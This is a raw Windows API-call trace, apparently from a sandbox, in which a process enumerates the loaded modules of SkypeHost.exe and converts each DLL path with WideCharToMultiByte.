	[0105.190] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.190] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.191] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.192] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.193] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.195] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.196] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.197] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.198] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.200] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.202] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.203] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.204] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.205] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.206] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.208] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.209] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.210] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.211] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.212] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.213] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.214] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.216] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.217] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.218] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.219] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.220] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.221] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.237] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.238] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.239] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.240] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.242] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.243] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.244] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.245] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.246] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.248] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.249] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.250] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.251] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.253] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.254] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.255] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.256] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.257] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.258] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.260] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.261] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.262] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.263] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.265] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.266] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.268] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.269] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.270] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.271] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.287] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.288] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.289] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.290] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.291] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.293] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.294] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.295] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.296] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.297] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.298] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.299] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.300] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.301] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.303] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.304] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.305] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.306] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.307] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.308] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.309] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.310] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.311] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.312] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.313] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.314] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.315] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.316] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 0
	[0105.317] Module32FirstW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\SkypeHost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\SkypeHost.exe", lpUsedDefaultChar=0x0) returned 95
	[0105.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 14
	[0105.318] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.319] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.320] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0105.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0105.321] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.322] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.342] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.343] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.344] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.345] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0105.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0105.346] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0105.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0105.347] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.347] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\SkypeBackgroundTasks.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\SkypeBackgroundTasks.dll", lpUsedDefaultChar=0x0) returned 106
	[0105.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeBackgroundTasks.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeBackgroundTasks.dll", lpUsedDefaultChar=0x0) returned 25
	[0105.348] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\vccorlib120_app.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\vccorlib120_app.DLL", lpUsedDefaultChar=0x0) returned 101
	[0105.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib120_app.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vccorlib120_app.DLL", lpUsedDefaultChar=0x0) returned 20
	[0105.349] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\OLEAUT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\OLEAUT32.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLEAUT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLEAUT32.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.350] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\msvcp120_app.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\msvcp120_app.dll", lpUsedDefaultChar=0x0) returned 98
	[0105.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120_app.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120_app.dll", lpUsedDefaultChar=0x0) returned 17
	[0105.352] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\msvcr120_app.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\msvcr120_app.dll", lpUsedDefaultChar=0x0) returned 98
	[0105.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120_app.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120_app.dll", lpUsedDefaultChar=0x0) returned 17
	[0105.353] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\kernel.appcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\kernel.appcore.dll", lpUsedDefaultChar=0x0) returned 39
	[0105.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kernel.appcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel.appcore.dll", lpUsedDefaultChar=0x0) returned 19
	[0105.354] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\twinapi.appcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\twinapi.appcore.dll", lpUsedDefaultChar=0x0) returned 40
	[0105.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="twinapi.appcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="twinapi.appcore.dll", lpUsedDefaultChar=0x0) returned 20
	[0105.355] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcrypt.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcrypt.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.356] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\WinTypes.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\WinTypes.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinTypes.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinTypes.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.357] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\shcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\shcore.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shcore.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shcore.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.358] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\user32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\user32.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="user32.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.359] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.360] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0105.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0105.361] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\mrmcorer.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\mrmcorer.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mrmcorer.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mrmcorer.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.362] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
